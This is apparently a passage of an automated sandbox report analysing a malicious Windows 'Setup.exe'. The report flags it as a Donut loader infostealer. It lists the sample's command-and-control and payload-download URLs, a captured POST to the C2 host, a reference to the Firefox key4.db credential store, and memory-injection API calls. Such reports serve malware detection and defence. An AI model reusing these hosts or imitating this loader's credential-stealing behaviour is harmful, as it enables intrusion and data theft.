HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: beefshooti.click

Source: Setup.exe, 00000000.00000003.1878632540.00000000038D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: Setup.exe, 00000000.00000003.1878632540.00000000038D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: Setup.exe, 00000000.00000003.1878632540.00000000038D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: Setup.exe, 00000000.00000003.1878632540.00000000038D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: Setup.exe, 00000000.00000003.1878632540.00000000038D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: Setup.exe, 00000000.00000003.1878632540.00000000038D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: Setup.exe, 00000000.00000003.1878632540.00000000038D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: powershell.exe, 00000004.00000002.2018847996.0000000004A11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://go.micros
Source: powershell.exe, 00000004.00000002.2023537372.0000000005598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: Setup.exe, 00000000.00000003.1878632540.00000000038D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: Setup.exe, 00000000.00000003.1878632540.00000000038D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: powershell.exe, 00000004.00000002.2018847996.0000000004686000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.2018847996.0000000004686000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000004.00000002.2018847996.0000000004531000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.2018847996.0000000004686000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000004.00000002.2018847996.0000000004686000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Setup.exe, 00000000.00000003.1878632540.00000000038D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: Setup.exe, 00000000.00000003.1878632540.00000000038D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: Setup.exe, 00000000.00000003.1824789597.00000000038EC000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1824919917.00000000038EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000004.00000002.2018847996.0000000004531000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000004.00000002.2018847996.0000000004686000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: Setup.exe, 00000000.00000002.1998660474.000000000104B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1903279526.000000000104B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1951085152.000000000105C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1905498616.000000000104D000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1823765883.0000000001002000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://beefshooti.click/
Source: Setup.exe, 00000000.00000003.1823765883.0000000001002000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://beefshooti.click/aN
Source: Setup.exe, 00000000.00000003.1823765883.0000000001002000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1903248864.00000000038A9000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1851695824.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://beefshooti.click/api
Source: Setup.exe, 00000000.00000003.1851207669.00000000038AA000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1851695824.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://beefshooti.click/apiA
Source: Setup.exe, 00000000.00000003.1909177966.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1995816294.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1823947002.0000000000FE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://beefshooti.click/apiN
Source: Setup.exe, 00000000.00000003.1823765883.0000000001002000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://beefshooti.click/apih3=
Source: Setup.exe, 00000000.00000003.1876780873.00000000038AF000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1874200327.00000000038AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://beefshooti.click/apij
Source: Setup.exe, 00000000.00000003.1823765883.0000000001002000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://beefshooti.click/asse
Source: Setup.exe, 00000000.00000003.1909177966.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1823947002.0000000000FE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://beefshooti.click:443/api
Source: Setup.exe, 00000000.00000003.1995816294.0000000000FE6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://beefshooti.click:443/api2o4p.default-release/key4.dbPK
Source: Setup.exe, 00000000.00000003.1823947002.0000000000FE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://beefshooti.click:443/apiN
Source: Setup.exe, 00000000.00000003.1909177966.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1995816294.0000000000FE6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://beefshooti.click:443/apim
Source: Setup.exe, 00000000.00000003.1824789597.00000000038EC000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1824919917.00000000038EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Setup.exe, 00000000.00000003.1824789597.00000000038EC000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1824919917.00000000038EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Setup.exe, 00000000.00000003.1824789597.00000000038EC000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1824919917.00000000038EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000004.00000002.2023537372.0000000005598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.2023537372.0000000005598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.2023537372.0000000005598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: Setup.exe, 00000000.00000003.1824789597.00000000038EC000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1824919917.00000000038EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Setup.exe, 00000000.00000003.1824789597.00000000038EC000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1824919917.00000000038EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Setup.exe, 00000000.00000003.1824789597.00000000038EC000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1824919917.00000000038EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: powershell.exe, 00000004.00000002.2018847996.0000000004686000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: Setup.exe, 00000000.00000002.1998660474.000000000104B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://klipcatepiu0.shop/
Source: Setup.exe, 00000000.00000002.1998660474.000000000104B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://klipcatepiu0.shop/hB
Source: Setup.exe, 00000000.00000003.1996461951.000000000105E000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.1998761099.0000000001060000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://klipcatepiu0.shop/int_clp_ldr_sha.txt
Source: Setup.exe, 00000000.00000002.1998349657.000000000100D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://klipcatepiu0.shop/int_clp_ldr_sha.txtDZ
Source: Setup.exe, 00000000.00000003.1996461951.000000000105E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://klipcatepiu0.shop/int_clp_ldr_sha.txtS
Source: Setup.exe, 00000000.00000003.1995816294.0000000000FE6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://klipcatepiu0.shop:443/int_clp_ldr_sha.txt
Source: Setup.exe, 00000000.00000002.1998349657.0000000001033000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://neqi.shop/sdgjyut/psh.txt
Source: Setup.exe, 00000000.00000002.1998349657.0000000001033000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://neqi.shop/sdgjyut/psh.txtM
Source: Setup.exe, 00000000.00000003.1995816294.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://neqi.shop/sdgjyut/psh.txtf5
Source: Setup.exe, 00000000.00000003.1995816294.0000000000FE6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://neqi.shop:443/sdgjyut/psh.txt
Source: powershell.exe, 00000004.00000002.2023537372.0000000005598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: Setup.exe, 00000000.00000003.1825717607.0000000003901000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsof
Source: Setup.exe, 00000000.00000003.1879956796.00000000039BF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: Setup.exe, 00000000.00000003.1879956796.00000000039BF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: Setup.exe, 00000000.00000003.1825827041.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1851951201.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1825717607.00000000038FF000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1851091316.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1851360446.00000000038F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: Setup.exe, 00000000.00000003.1825827041.00000000038D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: Setup.exe, 00000000.00000003.1825827041.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1851951201.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1825717607.00000000038FF000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1851091316.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1851360446.00000000038F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: Setup.exe, 00000000.00000003.1825827041.00000000038D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: Setup.exe, 00000000.00000003.1824789597.00000000038EC000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1824919917.00000000038EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Setup.exe, 00000000.00000003.1824789597.00000000038EC000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1824919917.00000000038EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Setup.exe	String found in binary or memory: https://www.innosetup.com/
Source: Setup.exe, 00000000.00000003.1879956796.00000000039BF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: Setup.exe, 00000000.00000003.1879956796.00000000039BF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: Setup.exe, 00000000.00000003.1879956796.00000000039BF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: Setup.exe, 00000000.00000003.1879956796.00000000039BF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Setup.exe, 00000000.00000003.1879956796.00000000039BF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: Setup.exe	String found in binary or memory: https://www.remobjects.com/ps

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443

Source: unknown	HTTPS traffic detected: 104.21.18.185:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.185:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.185:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.185:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.185:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.185:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.185:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.185:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.27.229:443 -> 192.168.2.4:49744 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_00F9B3DF NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,CreateThread,

0_2_00F9B3DF

Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_0102FC45	0_3_0102FC45
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_0102FC45	0_3_0102FC45
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_0392768F	0_3_0392768F
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_0392768F	0_3_0392768F
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_0392768F	0_3_0392768F
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_03927570	0_3_03927570
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_03927570	0_3_03927570
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_03927570	0_3_03927570
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_03926C60	0_3_03926C60
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_03926C60	0_3_03926C60
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_03926C60	0_3_03926C60
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_0102FC45	0_3_0102FC45
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_0102FC45	0_3_0102FC45
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_0392768F	0_3_0392768F
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_0392768F	0_3_0392768F
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_0392768F	0_3_0392768F
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_03927570	0_3_03927570
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_03927570	0_3_03927570
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_03927570	0_3_03927570
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_03926C60	0_3_03926C60
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_03926C60	0_3_03926C60
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_03926C60	0_3_03926C60
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_0392768F	0_3_0392768F
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_0392768F	0_3_0392768F
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_0392768F	0_3_0392768F
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_03927628	0_3_03927628
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_039276C8	0_3_039276C8
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_03927570	0_3_03927570
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_03927570	0_3_03927570
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_03927570	0_3_03927570
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_03926C60	0_3_03926C60
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_03926C60	0_3_03926C60
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_03926C60	0_3_03926C60
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_3_03926C6A	0_3_03926C6A
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F9B3DF	0_2_00F9B3DF
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F5041F	0_2_00F5041F
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F5C0EC	0_2_00F5C0EC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F7C057	0_2_00F7C057
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F8701C	0_2_00F8701C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F8E00C	0_2_00F8E00C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F50000	0_2_00F50000
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F7300C	0_2_00F7300C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F5719C	0_2_00F5719C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F5515C	0_2_00F5515C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F6B12C	0_2_00F6B12C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F822FC	0_2_00F822FC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F6F2FC	0_2_00F6F2FC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F6A290	0_2_00F6A290
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F85271	0_2_00F85271
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F6323C	0_2_00F6323C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F6023C	0_2_00F6023C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F773EC	0_2_00F773EC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F7D3D1	0_2_00F7D3D1
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F6C3CC	0_2_00F6C3CC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F80390	0_2_00F80390
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F5438C	0_2_00F5438C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F8735C	0_2_00F8735C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F864E3	0_2_00F864E3
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F8A4AC	0_2_00F8A4AC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F5B485	0_2_00F5B485
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F5644C	0_2_00F5644C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F825BC	0_2_00F825BC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F6F64C	0_2_00F6F64C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F5E638	0_2_00F5E638
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F8D62C	0_2_00F8D62C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F627C4	0_2_00F627C4
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F8A79C	0_2_00F8A79C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F5472C	0_2_00F5472C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F7270C	0_2_00F7270C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F5A8EC	0_2_00F5A8EC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F6F87C	0_2_00F6F87C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F6580C	0_2_00F6580C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F579FC	0_2_00F579FC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F869CC	0_2_00F869CC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F7097C	0_2_00F7097C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F8D94C	0_2_00F8D94C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F5992C	0_2_00F5992C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F5DA5C	0_2_00F5DA5C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F79BE9	0_2_00F79BE9
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F6EBCC	0_2_00F6EBCC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F6AB9F	0_2_00F6AB9F
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F55B0C	0_2_00F55B0C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F59CEC	0_2_00F59CEC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F68CEB	0_2_00F68CEB
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F80CCC	0_2_00F80CCC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F61C96	0_2_00F61C96
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F8DC9C	0_2_00F8DC9C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F58C6C	0_2_00F58C6C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F86C2C	0_2_00F86C2C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F87DEC	0_2_00F87DEC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F5AD0C	0_2_00F5AD0C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F6EEEC	0_2_00F6EEEC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F57E8C	0_2_00F57E8C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F89FEC	0_2_00F89FEC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F74F8C	0_2_00F74F8C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F62F55	0_2_00F62F55
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F76F20	0_2_00F76F20

Source: C:\Users\user\Desktop\Setup.exe	Code function: String function: 00F5972C appears 74 times
Source: C:\Users\user\Desktop\Setup.exe	Code function: String function: 00F657FC appears 53 times

Source: Setup.exe

Static PE information: invalid certificate

Source: Setup.exe

Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows

Source: Setup.exe

Static PE information: Number of sections : 11 > 10

Source: Setup.exe, 00000000.00000003.1774299719.00000000034B5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFileName vs Setup.exe
Source: Setup.exe, 00000000.00000000.1676651530.0000000000B68000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFileName vs Setup.exe
Source: Setup.exe	Binary or memory string: OriginalFileName vs Setup.exe

Source: Setup.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.1997756045.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@4/5@3/2

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_00F50B2F CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle,

0_2_00F50B2F

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2084:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1odyn1qj.bmh.ps1

Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Setup.exe, 00000000.00000003.1825946179.00000000038A5000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1825429813.00000000038D7000.00000004.00000800.00020000.00000000.sdmp

